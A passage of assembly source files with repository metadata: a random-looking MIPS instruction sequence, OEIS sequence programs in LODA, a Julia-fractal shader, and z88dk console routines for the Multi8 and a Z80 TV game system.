$ra,$ra,0xf
mthi $1
multu $4,$4
sll $4,$1,10
mfhi $4
mthi $1
mfhi $5
addiu $5,$1,6152
div $4,$ra
mthi $5
multu $5,$2
mfhi $4
mult $2,$2
sll $3,$2,19
addiu $0,$0,-21868
srav $6,$5,$5
addu $1,$1,$2
lb $3,8($0)
mult $6,$6
mflo $1
ori $4,$4,10597
sb $1,15($0)
divu $1,$ra
sll $1,$1,20
mthi $0
div $2,$ra
mthi $5
lui $6,49277
mtlo $4
sll $4,$4,12
addiu $6,$1,-6494
addiu $6,$2,-679
ori $2,$2,22428
mult $5,$4
addiu $0,$2,29241
divu $1,$ra
srav $0,$5,$0
addu $4,$4,$1
addu $4,$4,$2
divu $4,$ra
mult $4,$4
sll $4,$2,31
lb $0,2($0)
lb $0,15($0)
mult $1,$0
ori $6,$4,48955
addu $1,$6,$6
mflo $1
mult $4,$4
div $4,$ra
addiu $6,$4,12948
div $4,$ra
div $5,$ra
mtlo $4
sb $4,10($0)
divu $6,$ra
lui $4,40755
lui $1,55419
sll $4,$4,14
mfhi $4
sb $4,10($0)
mtlo $4
ori $6,$5,20792
mfhi $5
addu $5,$5,$5
div $5,$ra
divu $4,$ra
divu $6,$ra
ori $1,$1,19365
mfhi $4
mtlo $6
lui $5,33949
sb $5,9($0)
ori $0,$0,33049
mthi $4
mflo $5
divu $0,$ra
addiu $1,$4,-26074
mflo $0
multu $2,$2
mflo $1
mfhi $4
sb $4,11($0)
srav $4,$4,$4
divu $1,$ra
srav $5,$1,$5
addu $3,$5,$3
mult $4,$5
mfhi $2
mflo $1
div $4,$ra
mfhi $5
sb $4,1($0)
sb $1,5($0)
mtlo $3
sll $6,$1,0
mflo $4
ori $5,$5,35692
ori $3,$5,23879
mfhi $0
ori $6,$6,59555
srav $4,$4,$4
addiu $3,$1,-31618
lb $5,13($0)
lui $2,31175
lui $5,11900
mflo $4
sb $0,7($0)
multu $4,$5
multu $1,$4
mthi $0
divu $1,$ra
mfhi $4
srav $5,$5,$5
mfhi $1
mtlo $3
sb $0,16($0)
sb $4,11($0)
ori $1,$4,37586
ori $3,$3,8491
divu $1,$ra
sb $0,15($0)
mtlo $6
srav $5,$1,$0
addu $6,$4,$6
mflo $4
srav $3,$3,$3
ori $4,$4,59010
multu $4,$4
div $3,$ra
sll $1,$4,27
addiu $4,$4,13680
mult $5,$5
divu $5,$ra
srav $1,$1,$3
ori $1,$2,65531
mthi $4
mfhi $0
mflo $5
multu $4,$6
addu $0,$0,$0
mult $4,$5
div $2,$ra
divu $3,$ra
mtlo $5
mtlo $1
divu $2,$ra
srav $4,$4,$4
div $3,$ra
lui $4,1388
sll $4,$4,23
mflo $4
multu $5,$5
div $4,$ra
lui $0,1887
srav $1,$1,$1
divu $5,$ra
addu $3,$5,$3
mult $1,$4
sll $0,$2,18
addiu $1,$1,23569
mult $5,$1
mult $3,$4
sb $1,13($0)
addu $0,$4,$6
multu $6,$2
multu $1,$0
addiu $5,$5,-25847
ori $4,$2,3815
mfhi $0
sb $4,11($0)
srav $5,$4,$5
lb $6,9($0)
div $4,$ra
addu $1,$1,$4
mfhi $1
lb $1,16($0)
lui $4,2195
ori $4,$4,7112
mthi $5
mthi $3
sb $3,6($0)
mtlo $0
mflo $6
divu $6,$ra
srav $5,$2,$2
mthi $5
addiu $6,$6,14604
multu $5,$5
lb $5,1($0)
addiu $6,$5,23085
sll $5,$4,29
addiu $5,$0,-3385
srav $4,$6,$6
addu $3,$4,$3
divu $1,$ra
mult $5,$2
sb $6,2($0)
sll $4,$1,25
lui $2,55543
mflo $4
srav $1,$5,$2
srav $4,$2,$3
addiu $4,$2,15789
sll $5,$1,19
srav $6,$6,$4
mtlo $3
lb $4,1($0)
ori $5,$5,1005
div $1,$ra
srav $6,$5,$5
lb $3,12($0)
mflo $4
mfhi $0
sll $1,$1,15
sb $1,11($0)
addiu $6,$1,25628
mthi $1
mflo $4
sll $1,$5,14
lui $0,42016
addu $6,$6,$1
srav $0,$0,$0
mflo $4
mflo $4
sb $5,5($0)
lui $4,36508
sll $3,$3,0
srav $2,$2,$2
multu $5,$2
mflo $3
addu $4,$4,$4
mfhi $0
lui $0,44377
sll $5,$1,18
mtlo $1
div $4,$ra
addiu $6,$3,-25799
srav $5,$1,$3
srav $2,$2,$1
div $2,$ra
multu $6,$1
srav $4,$2,$4
mult $1,$4
srav $5,$2,$2
sll $0,$6,3
sll $6,$6,11
addu $1,$1,$3
div $5,$ra
addu $3,$3,$3
divu $0,$ra
div $5,$ra
mfhi $4
multu $4,$4
mflo $0
sb $4,4($0)
srav $4,$1,$1
mthi $5
sll $4,$4,26
ori $5,$2,40730
lb $1,4($0)
mfhi $0
addu $0,$6,$6
lb $4,6($0)
srav $3,$5,$3
lui $1,58450
mfhi $2
lui $1,16788
div $6,$ra
srav $4,$4,$1
lb $5,16($0)
mtlo $1
sll $6,$6,5
sll $4,$4,10
mflo $1
addu $4,$4,$4
mthi $4
addiu $5,$4,-24316
sb $1,11($0)
mflo $3
srav $5,$1,$3
mflo $4
addiu $4,$4,-11662
mult $0,$0
mthi $0
divu $1,$ra
mfhi $4
mfhi $1
sll $0,$2,15
divu $4,$ra
sb $4,2($0)
mflo $1
sll $4,$2,16
ori $4,$1,37729
div $3,$ra
lui $1,657
lui $0,48859
multu $1,$3
multu $1,$2
divu $4,$ra
lb $3,0($0)
sll $5,$4,9
lui $4,36436
multu $0,$3
sb $2,4($0)
addiu $1,$2,-21122
sll $3,$4,14
sb $4,5($0)
div $4,$ra
addu $1,$2,$3
ori $1,$1,54425
sb $1,3($0)
sll $6,$2,0
lui $5,5393
srav $1,$1,$1
mflo $5
mfhi $0
mtlo $2
mflo $4
sb $5,6($0)
addiu $4,$2,-12065
addu $4,$4,$4
mthi $3
srav $4,$2,$2
divu $5,$ra
addiu $4,$5,-22040
mthi $5
ori $5,$4,9989
addu $1,$4,$1
mflo $4
sb $4,10($0)
mult $1,$1
addiu $1,$1,9233
mult $0,$0
multu $0,$1
mflo $2
srav $4,$4,$4
multu $6,$6
mfhi $4
lb $4,7($0)
ori $0,$4,59732
addu $4,$6,$4
lui $4,18060
mfhi $5
mtlo $4
sb $5,1($0)
lb $1,5($0)
multu $2,$1
ori $5,$5,9223
divu $6,$ra
mult $1,$4
lui $0,23300
sll $5,$0,27
lb $5,0($0)
div $2,$ra
addiu $5,$5,-4527
addiu $4,$4,-28572
srav $6,$5,$3
mthi $4
mflo $0
mtlo $4
div $5,$ra
mult $1,$1
mult $4,$2
mtlo $1
mtlo $4
divu $4,$ra
lb $4,5($0)
lui $2,4556
addiu $4,$2,16154
lui $6,21511
sll $2,$2,27
sll $1,$1,13
sll $5,$2,16
mult $4,$3
sb $1,16($0)
ori $1,$6,49871
sb $1,14($0)
divu $1,$ra
mult $0,$0
ori $1,$2,38489
mflo $6
multu $3,$3
mfhi $0
mflo $2
divu $5,$ra
addu $4,$1,$3
div $4,$ra
mult $3,$5
mfhi $1
lui $1,6486
lui $1,3988
div $4,$ra
multu $4,$4
mflo $6
lui $3,47950
mtlo $3
mtlo $1
mfhi $4
sb $5,1($0)
ori $2,$2,22569
mult $4,$3
mflo $4
addu $5,$5,$4
sll $5,$5,21
lb $1,10($0)
divu $4,$ra
addiu $0,$1,-10044
multu $5,$5
divu $5,$ra
multu $4,$4
srav $4,$4,$3
div $3,$ra
srav $4,$4,$4
lui $4,60738
srav $5,$2,$3
mult $6,$4
mthi $0
addu $6,$6,$6
sb $1,4($0)
srav $5,$5,$5
sb $4,13($0)
lui $4,48768
divu $1,$ra
mfhi $4
mfhi $2
mfhi $1
mtlo $3
addu $4,$4,$5
mfhi $1
mtlo $1
mfhi $1
mflo $5
mfhi $4
lb $6,1($0)
ori $3,$3,23187
div $5,$ra
lb $1,10($0)
ori $1,$1,29522
lb $2,0($0)
mult $6,$6
div $5,$ra
mtlo $0
multu $0,$1
mult $1,$1
sb $2,5($0)
multu $4,$2
mult $5,$3
mflo $5
multu $0,$0
mtlo $1
mfhi $1
div $0,$ra
mflo $2
mthi $4
mult $1,$1
mult $0,$0
div $2,$ra
lb $4,8($0)
multu $2,$1
mtlo $1
divu $1,$ra
divu $0,$ra
lb $2,15($0)
sll $1,$1,11
mult $5,$2
mtlo $3
ori $4,$6,33692
div $5,$ra
divu $6,$ra
divu $1,$ra
sll $4,$2,17
lui $0,12640
mflo $1
mflo $1
multu $1,$1
multu $2,$2
div $0,$ra
mflo $5
lb $1,15($0)
sll $2,$2,5
multu $4,$4
lb $4,11($0)
mult $4,$4
mthi $2
divu $0,$ra
mflo $5
mthi $1
mfhi $4
mtlo $4
multu $6,$6
addiu $1,$5,8910
multu $5,$4
ori $1,$1,16019
addiu $4,$5,-30194
mfhi $1
ori $4,$4,28303
mtlo $3
lb $0,14($0)
addu $3,$3,$3
mult $4,$4
mfhi $1
addu $4,$2,$1
multu $3,$6
ori $3,$1,2952
mtlo $4
sll $0,$0,2
divu $1,$ra
mflo $0
lui $4,18678
lb $0,2($0)
addu $6,$6,$2
multu $1,$2
mflo $1
divu $4,$ra
lui $2,28339
mfhi $1
mfhi $5
srav $4,$2,$4
sll $4,$2,27
lb $4,15($0)
ori $0,$2,11646
mflo $5
multu $4,$2
lui $0,12220
sll $1,$4,16
mthi $1
lui $4,8619
div $4,$ra
addiu $4,$5,-11713
div $0,$ra
mthi $5
mfhi $0
mflo $5
div $4,$ra
ori $4,$5,52733
addu $6,$1,$1
mtlo $4
sb $5,10($0)
multu $6,$6
mfhi $4
ori $2,$4,58521
addu $1,$4,$4
sb $4,9($0)
mflo $4
sb $1,13($0)
ori $4,$1,2934
addu $4,$2,$4
mult $4,$2
lb $5,4($0)
lb $2,16($0)
mthi $5
addiu $1,$1,-23801
addiu $4,$4,-21617
lb $1,8($0)
mflo $0
mthi $2
sll $1,$1,0
lui $4,28275
srav $5,$6,$3
srav $4,$4,$0
sll $5,$1,17
mthi $5
mflo $4
div $0,$ra
srav $5,$5,$5
mult $3,$3
mthi $1
div $5,$ra
multu $2,$2
mtlo $6
mflo $4
divu $1,$ra
mult $4,$1
sb $0,4($0)
addu $6,$4,$3
sll $0,$2,16
srav $1,$1,$4
mtlo $4
lb $5,1($0)
addu $2,$2,$4
divu $5,$ra
srav $5,$4,$5
mtlo $6
addiu $4,$4,-25044
mthi $1
divu $1,$ra
mthi $4
lb $2,2($0)
divu $4,$ra
sll $1,$1,21
mtlo $4
lb $4,3($0)
mfhi $5
mtlo $6
ori $6,$2,18097
addiu $4,$2,7927
sb $5,14($0)
mfhi $1
multu $5,$2
lb $4,11($0)
divu $4,$ra
lb $0,11($0)
mtlo $2
ori $3,$3,5796
divu $0,$ra
mfhi $3
mult $2,$2
sb $1,14($0)
srav $5,$6,$0
divu $4,$ra
sll $4,$5,23
mthi $4
mtlo $1
lb $5,9($0)
div $6,$ra
div $4,$ra
mult $5,$4
lb $5,7($0)
addiu $6,$0,27334
addu $3,$3,$3
mfhi $1
lb $0,12($0)
mfhi $0
srav $6,$1,$6
ori $4,$1,39905
srav $1,$1,$0
mtlo $1
mthi $5
div $6,$ra
div $0,$ra
mflo $3
divu $4,$ra
srav $0,$4,$2
mult $4,$4
sll $1,$2,17
mflo $2
mthi $4
lb $5,16($0)
mthi $4
mtlo $3
mult $6,$6
mflo $2
sb $4,11($0)
mthi $0
mult $0,$0
mthi $6
sb $4,3($0)
div $1,$ra
addu $4,$4,$2
lui $5,43731
srav $5,$4,$5
div $4,$ra
lui $4,9320
divu $4,$ra
lb $4,16($0)
mfhi $1
mtlo $4
srav $4,$5,$4
sll $4,$4,16
div $6,$ra
div $1,$ra
mult $4,$2
divu $0,$ra
mfhi $5
sll $1,$1,30
srav $4,$5,$1
div $5,$ra
addu $5,$3,$3
addiu $1,$1,10086
divu $5,$ra
divu $1,$ra
mthi $3
mtlo $4
mfhi $3
div $2,$ra
mthi $2
srav $1,$0,$3
srav $3,$2,$3
sll $5,$5,3
mflo $4
srav $4,$4,$4
divu $3,$ra
addu $2,$2,$2
addiu $4,$6,18452
addiu $1,$2,-11059
mtlo $0
mflo $1
mfhi $0
sll $5,$3,20
mtlo $4
mthi $4
lui $1,36693
sb $5,11($0)
srav $6,$6,$0
mflo $4
div $4,$ra
mflo $1
multu $4,$4
sll $5,$1,5
mtlo $5
lui $5,20906
ori $1,$2,10477
mult $4,$1
mfhi $2
multu $4,$6
lb $1,5($0)
divu $4,$ra
mult $6,$6
mflo $2
addiu $4,$4,-9762
srav $2,$2,$3
addiu $1,$2,-12658
addu $5,$5,$3
multu $6,$6
addiu $4,$1,-24399
mult $4,$2
mtlo $4
mfhi $5
sll $5,$4,18
mult $3,$2
addu $2,$2,$4
addu $3,$2,$3
srav $1,$2,$2
addu $4,$4,$1
ori $5,$5,10519
divu $4,$ra
addu $1,$2,$0
addu $2,$2,$2
mthi $5
multu $3,$3
divu $2,$ra
mtlo $4
addu $1,$0,$4
sll $3,$3,19
lb $6,1($0)
mflo $1
ori $1,$1,59984
mthi $2
mflo $6
mflo $4
srav $3,$2,$3
divu $5,$ra
addu $3,$5,$3
mfhi $1
divu $4,$ra
mult $1,$2
div $1,$ra
mult $0,$4
ori $3,$3,57672
addu $6,$6,$3
mflo $0
divu $0,$ra
addiu $4,$6,2259
addu $1,$2,$1
sb $1,10($0)
mfhi $2
lui $0,41304
mtlo $1
addu $3,$4,$3
sb $5,9($0)
lui $5,9285
lui $0,35202
mtlo $4
ori $4,$6,47239
mfhi $0
lb $2,5($0)
addiu $0,$2,10956
lb $1,11($0)
mthi $3
ori $4,$6,35769
mthi $5
mtlo $1
addu $5,$1,$5
mflo $2
srav $4,$5,$4
srav $4,$1,$4
mflo $6
srav $2,$4,$2
sll $3,$4,29
addu $1,$5,$4
mflo $1
sb $0,6($0)
mult $5,$2
srav $4,$1,$1
sb $5,0($0)
sb $6,9($0)
lui $4,46759
mfhi $1
addiu $4,$0,-29340
mthi $4
addu $5,$4,$3
mult $6,$6
lui $0,42085
sb $2,1($0)
ori $6,$3,22478
mfhi $4
addu $5,$5,$1
srav $4,$4,$4
lb $1,4($0)
addu $5,$6,$2
mfhi $3
sll $4,$4,18
lb $2,13($0)
lb $4,1($0)
addiu $5,$6,-5292
lui $6,21860
multu $4,$4
sll $4,$4,7
srav $1,$1,$0
mthi $1
mthi $4
div $6,$ra
mtlo $0
divu $2,$ra
mthi $4
div $1,$ra
mthi $4
sb $1,4($0)
lui $6,18934
sb $6,8($0)
mthi $4
lb $1,16($0)
mfhi $4
mflo $1
srav $5,$5,$5
sll $1,$2,5
lb $0,6($0)
divu $4,$ra
addiu $4,$5,3339
lui $2,30426
ori $6,$1,7895
div $4,$ra
mult $0,$0
mthi $4
sll $4,$5,20
srav $5,$2,$3
mthi $5
srav $3,$3,$3
multu $5,$5
div $5,$ra
lui $4,32121
lui $2,45626
mfhi $3
addiu $1,$4,-24520
mtlo $0
mflo $4
div $2,$ra
mult $1,$1
mfhi $6
srav $1,$5,$5
lb $6,14($0)
mthi $1
ori $2,$2,2970
ori $5,$4,43267
mult $1,$6
ori $1,$2,6754
sll $5,$3,11
addu $3,$4,$3
ori $1,$4,45394
divu $3,$ra
sb $0,16($0)
mtlo $6
sb $4,8($0)
ori $4,$3,61888
lui $4,64661
sb $3,5($0)
mthi $4
div $5,$ra
mtlo $6
mfhi $2
multu $4,$2
lui $1,15482
divu $4,$ra
lui $2,65398
sb $4,0($0)
addiu $4,$4,-3233
divu $1,$ra
lui $4,54304
lb $0,1($0)
multu $5,$5
lb $1,9($0)
divu $4,$ra
mfhi $4
addiu $4,$6,15814
srav $4,$4,$4
srav $1,$1,$1
mult $4,$6
multu $4,$2
|
||||
TheStack | f8368550d01a7773f314d2fad05057854f454522 | Assemblycode:Assembly | {"size": 581, "ext": "asm", "max_stars_repo_path": "oeis/144/A144650.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/144/A144650.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/144/A144650.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 30.5789473684, "max_line_length": 348, "alphanum_fraction": 0.65232358} | ; A144650: Triangle read by rows where T(m,n) = 2m*n + m + n + 1.
; Submitted by Christian Krause
; 5,8,13,11,18,25,14,23,32,41,17,28,39,50,61,20,33,46,59,72,85,23,38,53,68,83,98,113,26,43,60,77,94,111,128,145,29,48,67,86,105,124,143,162,181,32,53,74,95,116,137,158,179,200,221,35,58,81,104,127,150,173,196,219,242,265,38,63,88,113,138,163,188,213,238,263,288,313,41,68,95,122,149,176,203,230,257,284,311,338,365,44,73,102,131,160,189,218,247,276
mul $0,2
add $0,1
lpb $0
mov $2,$0
sub $0,2
trn $0,$1
add $1,2
add $2,2
lpe
add $1,1
mul $1,$2
mov $0,$1
div $0,2
add $0,1
|
||||
TheStack | e8c64b962c9d1b36fd9e6220b0fc365d35f82e2f | Assemblycode:Assembly | {"size": 339, "ext": "asm", "max_stars_repo_path": "programs/oeis/220/A220018.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/220/A220018.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/220/A220018.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 48.4285714286, "max_line_length": 206, "alphanum_fraction": 0.7522123894} | ; A220018: Number of cyclotomic cosets of 3 mod 10^n.
; 4,11,29,71,129,203,293,399,521,659,813,983,1169,1371,1589,1823,2073,2339,2621,2919,3233,3563,3909,4271,4649,5043,5453,5879,6321,6779,7253,7743,8249,8771,9309,9863,10433,11019,11621,12239,12873,13523,14189
seq $0,220020 ; Number of cyclotomic cosets of 9 mod 10^n.
add $0,2
div $0,2
|
||||
TheStack | 4a670e2ad58661d2f74a4319f54cc5f9c2bc2732 | Assemblycode:Assembly | {"size": 483, "ext": "asm", "max_stars_repo_path": "oeis/074/A074867.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/074/A074867.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/074/A074867.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 34.5, "max_line_length": 247, "alphanum_fraction": 0.5817805383} | ; A074867: a(n) = M(a(n-1)) + M(a(n-2)) where a(1)=a(2)=1 and M(k) is the product of the digits of k in base 10.
; Submitted by Christian Krause
; 1,1,2,3,5,8,13,11,4,5,9,14,13,7,10,7,7,14,11,5,6,11,7,8,15,13,8,11,9,10,9,9,18,17,15,12,7,9,16,15,11,6,7,13,10,3,3,6,9,15,14,9,13,12,5,7,12,9,11,10,1,1,2,3,5,8,13,11,4,5,9,14,13,7,10,7,7,14,11,5,6,11,7,8,15,13,8,11,9,10,9,9,18,17,15,12,7,9,16,15
mov $3,1
lpb $0
sub $0,1
mod $3,10
mov $2,$3
add $3,$1
mov $1,$2
lpe
mov $0,$3
|
||||
TheStack | 1544de26938f69b977bb3fc6037721fac8cba3a7 | Assemblycode:Assembly | {"size": 2388, "ext": "asm", "max_stars_repo_path": "wet julia/src/julia.asm", "max_stars_repo_name": "glennlunder/asmforce", "max_stars_repo_stars_event_min_datetime": "2018-01-12T21:40:00.000Z", "max_stars_repo_stars_event_max_datetime": "2018-01-12T21:40:00.000Z", "max_issues_repo_path": "wet julia/src/julia.asm", "max_issues_repo_name": "glennlunder/asmforce", "max_issues_repo_issues_event_min_datetime": "2020-04-24T10:03:18.000Z", "max_issues_repo_issues_event_max_datetime": "2020-04-24T10:03:18.000Z", "max_forks_repo_path": "wet julia/src/julia.asm", "max_forks_repo_name": "glennlunder/asmforce", "max_forks_repo_forks_event_min_datetime": "2019-09-01T06:21:49.000Z", "max_forks_repo_forks_event_max_datetime": "2019-09-01T06:21:49.000Z"} | {"max_stars_count": 1, "max_issues_count": 1, "max_forks_count": 1, "avg_line_length": 15.8145695364, "max_line_length": 60, "alphanum_fraction": 0.5016750419} | parameter "_OutCoord", float2, f0.rg, in
texture "wave0", t0
parameter "result", float4, f1, out
parameter "scale", float2, f0.ba, in
parameter "c", float2, f2.rg, in
;----------------------------------------------------------
texn f1, f0.rg, t0
mul f0.rg, f0.ba
set f3.r, 2
sub f0.rg, f3.rr
mov f3.rg, f0.rg
mul f0.rg, f0.rg
sub f0.r, f0.g
add f0.r, f2.r
mul f3.r, f3.g
add f3.r, f3.r
add f3.r, f2.g
mov f0.g, f3.r
mov f3.rg, f0.rg
mul f3.rg, f3.rg
add f3.r, f3.g
set f4.r, 32
ltn f3.r, f4.r
if i0.r
mov f3.rg, f0.rg
mul f0.rg, f0.rg
sub f0.r, f0.g
add f0.r, f2.r
mul f3.r, f3.g
add f3.r, f3.r
add f3.r, f2.g
mov f0.g, f3.r
mov f3.rg, f0.rg
mul f3.rg, f3.rg
add f3.r, f3.g
ltn f3.r, f4.r
if i0.r
mov f3.rg, f0.rg
mul f0.rg, f0.rg
sub f0.r, f0.g
add f0.r, f2.r
mul f3.r, f3.g
add f3.r, f3.r
add f3.r, f2.g
mov f0.g, f3.r
mov f3.rg, f0.rg
mul f3.rg, f3.rg
add f3.r, f3.g
ltn f3.r, f4.r
if i0.r
mov f3.rg, f0.rg
mul f0.rg, f0.rg
sub f0.r, f0.g
add f0.r, f2.r
mul f3.r, f3.g
add f3.r, f3.r
add f3.r, f2.g
mov f0.g, f3.r
mov f3.rg, f0.rg
mul f3.rg, f3.rg
add f3.r, f3.g
ltn f3.r, f4.r
if i0.r
mov f3.rg, f0.rg
mul f0.rg, f0.rg
sub f0.r, f0.g
add f0.r, f2.r
mul f3.r, f3.g
add f3.r, f3.r
add f3.r, f2.g
mov f0.g, f3.r
mov f3.rg, f0.rg
mul f3.rg, f3.rg
add f3.r, f3.g
ltn f3.r, f4.r
if i0.r
set f1.rgb, 0.2
mov f3.rg, f0.rg
mul f0.rg, f0.rg
sub f0.r, f0.g
add f0.r, f2.r
mul f3.r, f3.g
add f3.r, f3.r
add f3.r, f2.g
mov f0.g, f3.r
mov f3.rg, f0.rg
mul f3.rg, f3.rg
add f3.r, f3.g
ltn f3.r, f4.r
if i0.r
set f1.rgb, 0.4
mov f3.rg, f0.rg
mul f0.rg, f0.rg
sub f0.r, f0.g
add f0.r, f2.r
mul f3.r, f3.g
add f3.r, f3.r
add f3.r, f2.g
mov f0.g, f3.r
mov f3.rg, f0.rg
mul f3.rg, f3.rg
add f3.r, f3.g
ltn f3.r, f4.r
if i0.r
set f1.rgb, 0.8
mov f3.rg, f0.rg
mul f0.rg, f0.rg
sub f0.r, f0.g
add f0.r, f2.r
mul f3.r, f3.g
add f3.r, f3.r
add f3.r, f2.g
mov f0.g, f3.r
mov f3.rg, f0.rg
mul f3.rg, f3.rg
add f3.r, f3.g
ltn f3.r, f4.r
if i0.r
set f1.rgb, 1
end
end
end
end
end
end
end
end
|
||||
TheStack | 97ee5785516f83e77639c9d21cadfadc88070592 | Assemblycode:Assembly | {"size": 1541, "ext": "asm", "max_stars_repo_path": "libsrc/target/multi8/gencon/generic_console_ioctl.asm", "max_stars_repo_name": "jpoikela/z88dk", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "libsrc/target/multi8/gencon/generic_console_ioctl.asm", "max_issues_repo_name": "jpoikela/z88dk", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "libsrc/target/multi8/gencon/generic_console_ioctl.asm", "max_forks_repo_name": "jpoikela/z88dk", "max_forks_repo_forks_event_min_datetime": "2019-12-03T23:28:20.000Z", "max_forks_repo_forks_event_max_datetime": "2019-12-03T23:28:20.000Z"} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": 1, "avg_line_length": 17.7126436782, "max_line_length": 42, "alphanum_fraction": 0.7287475665} |
MODULE generic_console_ioctl
PUBLIC generic_console_ioctl
SECTION code_clib
INCLUDE "ioctl.def"
EXTERN generic_console_cls
EXTERN generic_console_font32
EXTERN generic_console_udg32
EXTERN __multi8_mode
EXTERN __console_h
EXTERN __console_w
EXTERN __port29_copy
EXTERN __vram_in
; a = ioctl
; de = arg
generic_console_ioctl:
ex de,hl
ld c,(hl) ;bc = where we point to
inc hl
ld b,(hl)
cp IOCTL_GENCON_SET_FONT32
jr nz,check_set_udg
ld (generic_console_font32),bc
success:
and a
ret
check_set_udg:
cp IOCTL_GENCON_SET_UDGS
jr nz,check_mode
ld (generic_console_udg32),bc
jr success
check_mode:
cp IOCTL_GENCON_SET_MODE
jr nz,failure
ld a,c
cp 1
jr z,set_mode_1
and a
jr z,set_mode_0
cp 2
jr nz,failure
set_mode_2: ;Graphics
in a,($2a)
and @00100000 ;Keep lower RAM page
or @00011000 ;Page in all graphics pages
ld l,a
ld a,(__port29_copy)
ld h,80
and @10111111 ;Bit 6 = 0 = 40 column
set_mode:
ld (__port29_copy),a
out ($29),a
ld a,c
ld (__multi8_mode),a
ld a,h
ld (__console_w),a
ld a,l
ld (__vram_in),a
call generic_console_cls
jr success
set_mode_1: ; 80 col text
in a,($2a)
and @00100111 ;Keep lower RAM page
or @00010111 ;Page in text page
ld l,a
ld a,(__port29_copy)
and @00111111 ;Bit 6 = 1 = 80 column
or @01000000
ld h,80
jr set_mode
set_mode_0: ; 40 col text
in a,($2a)
and @00100111 ;Keep lower RAM page
or @00010111 ;Page in all text page
ld l,a
ld a,(__port29_copy)
and @00111111 ;Bit 6 = 0 = 40 column
ld h,40
jr set_mode
failure:
scf
ret
|
||||
TheStack | 25668dd339c47ea29f7bdbed9b267ff37a5cce14 | Assemblycode:Assembly | {"size": 1548, "ext": "asm", "max_stars_repo_path": "libsrc/stdio/z80tvgame/generic_console_vpeek.asm", "max_stars_repo_name": "jpoikela/z88dk", "max_stars_repo_stars_event_min_datetime": "2017-01-14T23:33:45.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T11:28:42.000Z", "max_issues_repo_path": "libsrc/stdio/z80tvgame/generic_console_vpeek.asm", "max_issues_repo_name": "jpoikela/z88dk", "max_issues_repo_issues_event_min_datetime": "2017-01-15T16:12:02.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-31T12:11:12.000Z", "max_forks_repo_path": "libsrc/stdio/z80tvgame/generic_console_vpeek.asm", "max_forks_repo_name": "jpoikela/z88dk", "max_forks_repo_forks_event_min_datetime": "2017-01-17T10:43:03.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-23T17:25:02.000Z"} | {"max_stars_count": 640, "max_issues_count": 1600, "max_forks_count": 215, "avg_line_length": 21.8028169014, "max_line_length": 70, "alphanum_fraction": 0.480620155} |
SECTION code_clib
PUBLIC generic_console_vpeek
EXTERN generic_console_xypos_graphics
EXTERN screendollar
EXTERN screendollar_with_count
EXTERN generic_console_font32
EXTERN generic_console_udg32
;Entry: c = x,
; b = y
; e = rawmode
;Exit: nc = success
; a = character,
; c = failure
generic_console_vpeek:
ld hl,-8
add hl,sp ;de = screen, hl = buffer, bc = coords
ld sp,hl
push hl ;Save buffer
push hl
call generic_console_xypos_graphics
pop de
ld b,8
vpeek_1:
ld a,(hl)
; Reverse
ld c,a
rlca
rlca
xor c
and 0xaa
xor c
ld c,a
rlca
rlca
rlca
rrc c
xor c
and 0x66
xor c
ld (de),a
inc de
ld a,l
add 30
ld l,a
jr nc,no_overflow
inc h
no_overflow:
djnz vpeek_1
pop de ;the buffer on the stack
ld hl,(generic_console_font32)
call screendollar
jr nc,gotit
ld hl,(generic_console_udg32)
ld b,128
call screendollar_with_count
jr c,gotit
add 128
gotit:
ex af,af ; Save those flags
ld hl,8 ; Dump our temporary buffer
add hl,sp
ld sp,hl
ex af,af ; Flags and parameter back
ret
|
||||
